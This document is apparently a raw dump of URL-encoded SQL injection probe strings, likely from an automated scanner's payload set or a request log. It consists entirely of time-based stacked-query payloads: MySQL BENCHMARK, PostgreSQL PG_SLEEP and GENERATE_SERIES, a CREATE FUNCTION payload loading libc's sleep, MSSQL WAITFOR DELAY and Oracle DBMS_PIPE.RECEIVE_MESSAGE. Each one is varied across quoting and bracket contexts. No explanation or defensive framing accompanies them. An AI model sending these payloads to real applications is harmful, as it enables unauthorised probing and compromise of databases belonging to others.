foo%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%28%28%27XrFV%27%20LIKE%20%27XrFV foo%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%27CcjV%27%20LIKE%20%27CcjV foo%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%22QnTE%22%3D%22QnTE foo%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%28%22qsLd%22%3D%22qsLd foo%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%28%28%22irEw%22%3D%22irEw foo%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%22mRnO%22%3D%22mRnO foo%22%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%22WZTQ%22%20LIKE%20%22WZTQ foo%22%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%28%22crnR%22%20LIKE%20%22crnR foo%22%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%28%28%22Utiu%22%20LIKE%20%22Utiu foo%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%22slgd%22%20LIKE%20%22slgd foo%29%20WHERE%204920%3D4920%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23 foo%27%29%20WHERE%204339%3D4339%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23 foo%27%20WHERE%204496%3D4496%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23 foo%22%20WHERE%203952%3D3952%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23 foo%27%20%7C%7C%20%28SELECT%207806%20FROM%20DUAL%20WHERE%203385%3D3385%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206552%20WHERE%202747%3D2747%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%207883%20FROM%20DUAL%20WHERE%202425%3D2425%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20%29 foo%20%2B%20%28SELECT%206782%20WHERE%204723%3D4723%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20%29 foo%27%20%2B%20%28SELECT%20%27fOgA%27%20FROM%20DUAL%20WHERE%204126%3D4126%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27enOw%27%20WHERE%206640%3D6640%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20%23 foo%29%3B%20SELECT%20PG_SLEEP%285%29%3B-- foo%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B-- foo%27%3B%20SELECT%20PG_SLEEP%285%29%3B-- foo%22%3B%20SELECT%20PG_SLEEP%285%29%3B-- foo%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%284096%3D4096 foo%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%288789%3D8789 foo%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%288400%3D8400 foo%3B%20SELECT%20PG_SLEEP%285%29%3B-- foo%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%27xipy%27%3D%27xipy foo%27%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%27AJRF%27%3D%27AJRF foo%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%27tnyb%27%3D%27tnyb foo%27%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%27CzVr%27%3D%27CzVr foo%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%27GfYA%27%20LIKE%20%27GfYA foo%27%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%27LRBg%27%20LIKE%20%27LRBg foo%27%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%27AzJO%27%20LIKE%20%27AzJO foo%27%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%27KiMt%27%20LIKE%20%27KiMt foo%22%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%22FMCz%22%3D%22FMCz foo%22%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%22xJyP%22%3D%22xJyP foo%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%22cmIY%22%3D%22cmIY foo%22%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%22Plle%22%3D%22Plle foo%22%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%22JNdV%22%20LIKE%20%22JNdV foo%22%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%22EFQB%22%20LIKE%20%22EFQB foo%22%29%29%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%28%28%22hoXI%22%20LIKE%20%22hoXI foo%22%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%22KrTt%22%20LIKE%20%22KrTt foo%29%20WHERE%208152%3D8152%3B%20SELECT%20PG_SLEEP%285%29%3B-- foo%27%29%20WHERE%203472%3D3472%3B%20SELECT%20PG_SLEEP%285%29%3B-- foo%27%20WHERE%208621%3D8621%3B%20SELECT%20PG_SLEEP%285%29%3B-- foo%22%20WHERE%206281%3D6281%3B%20SELECT%20PG_SLEEP%285%29%3B-- foo%27%20%7C%7C%20%28SELECT%205233%20FROM%20DUAL%20WHERE%209919%3D9919%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208913%20WHERE%205718%3D5718%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%201956%20FROM%20DUAL%20WHERE%208059%3D8059%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29 foo%20%2B%20%28SELECT%203488%20WHERE%206159%3D6159%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27GGqm%27%20FROM%20DUAL%20WHERE%207529%3D7529%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27ArlO%27%20WHERE%207258%3D7258%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20%23 foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%284862%3D4862 foo%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%281939%3D1939 foo%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%287547%3D7547 foo%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%27Byud%27%3D%27Byud foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%27SQOG%27%3D%27SQOG foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%27yoCY%27%3D%27yoCY foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%27iecw%27%3D%27iecw foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%27xcnu%27%20LIKE%20%27xcnu foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%27rnGu%27%20LIKE%20%27rnGu foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%27upit%27%20LIKE%20%27upit foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%27xKfo%27%20LIKE%20%27xKfo foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%22ildk%22%3D%22ildk foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%22GVKi%22%3D%22GVKi foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%22NmZF%22%3D%22NmZF foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%22emBC%22%3D%22emBC foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%22LkIX%22%20LIKE%20%22LkIX foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%22NfbJ%22%20LIKE%20%22NfbJ foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%28%28%28%22yYbB%22%20LIKE%20%22yYbB foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20AND%20%22zczm%22%20LIKE%20%22zczm foo%29%20WHERE%205715%3D5715%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- foo%27%29%20WHERE%206534%3D6534%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- foo%27%20WHERE%206377%3D6377%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- foo%22%20WHERE%207614%3D7614%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B-- foo%27%20%7C%7C%20%28SELECT%203786%20FROM%20DUAL%20WHERE%209814%3D9814%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208033%20WHERE%207383%3D7383%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%207655%20FROM%20DUAL%20WHERE%202332%3D2332%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29 foo%20%2B%20%28SELECT%202592%20WHERE%203157%3D3157%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27TFyk%27%20FROM%20DUAL%20WHERE%207994%3D7994%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27UlSx%27%20WHERE%202510%3D2510%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%3B--%20%23 foo%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- foo%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- foo%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- foo%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- foo%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%288505%3D8505 foo%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%285894%3D5894 foo%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%283953%3D3953 foo%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- foo%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%27piiu%27%3D%27piiu foo%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%27KOLY%27%3D%27KOLY foo%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%27FagM%27%3D%27FagM foo%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%27NYiQ%27%3D%27NYiQ foo%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%27oMVn%27%20LIKE%20%27oMVn foo%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%27RgVl%27%20LIKE%20%27RgVl foo%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%27exXL%27%20LIKE%20%27exXL foo%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%27imxl%27%20LIKE%20%27imxl foo%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%22SnYt%22%3D%22SnYt foo%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%22BXUw%22%3D%22BXUw foo%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%22jcme%22%3D%22jcme foo%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%22uVHz%22%3D%22uVHz foo%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%22PnIx%22%20LIKE%20%22PnIx foo%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%22GaGH%22%20LIKE%20%22GaGH foo%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%22maJy%22%20LIKE%20%22maJy foo%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%22hwjS%22%20LIKE%20%22hwjS foo%29%20WHERE%208983%3D8983%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- foo%27%29%20WHERE%203350%3D3350%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- foo%27%20WHERE%201768%3D1768%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- foo%22%20WHERE%207952%3D7952%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- foo%27%20%7C%7C%20%28SELECT%204052%20FROM%20DUAL%20WHERE%208677%3D8677%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206020%20WHERE%207901%3D7901%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%208332%20FROM%20DUAL%20WHERE%203192%3D3192%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29 foo%20%2B%20%28SELECT%202010%20WHERE%208910%3D8910%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27tWBH%27%20FROM%20DUAL%20WHERE%208266%3D8266%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27rKKS%27%20WHERE%206660%3D6660%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%23 foo%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- foo%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- foo%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- foo%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- foo%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%288326%3D8326 foo%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%289194%3D9194 foo%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%282487%3D2487 foo%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- foo%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%27hKnh%27%3D%27hKnh foo%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%27Vari%27%3D%27Vari foo%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%27Jruk%27%3D%27Jruk foo%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%27PAaM%27%3D%27PAaM foo%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%27xdoy%27%20LIKE%20%27xdoy foo%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%27Qjdl%27%20LIKE%20%27Qjdl foo%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%27zRtL%27%20LIKE%20%27zRtL foo%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%27ujix%27%20LIKE%20%27ujix foo%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%22Htdg%22%3D%22Htdg foo%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%22fIxT%22%3D%22fIxT foo%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%22xEjR%22%3D%22xEjR foo%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%22cplt%22%3D%22cplt foo%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%22ADgL%22%20LIKE%20%22ADgL foo%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%22ONFy%22%20LIKE%20%22ONFy foo%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%22oanz%22%20LIKE%20%22oanz foo%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%22avaZ%22%20LIKE%20%22avaZ foo%29%20WHERE%207490%3D7490%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- foo%27%29%20WHERE%206970%3D6970%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- foo%27%20WHERE%209587%3D9587%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- foo%22%20WHERE%201449%3D1449%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- foo%27%20%7C%7C%20%28SELECT%203141%20FROM%20DUAL%20WHERE%201406%3D1406%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208940%20WHERE%205172%3D5172%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%208985%20FROM%20DUAL%20WHERE%204346%3D4346%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29 foo%20%2B%20%28SELECT%209548%20WHERE%205780%3D5780%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27RHxe%27%20FROM%20DUAL%20WHERE%207868%3D7868%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27moBr%27%20WHERE%204740%3D4740%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%23 foo%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B-- foo%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B-- foo%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B-- foo%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B-- foo%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2869%29%7C%7CCHR%28111%29%7C%7CCHR%28111%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%286983%3D6983 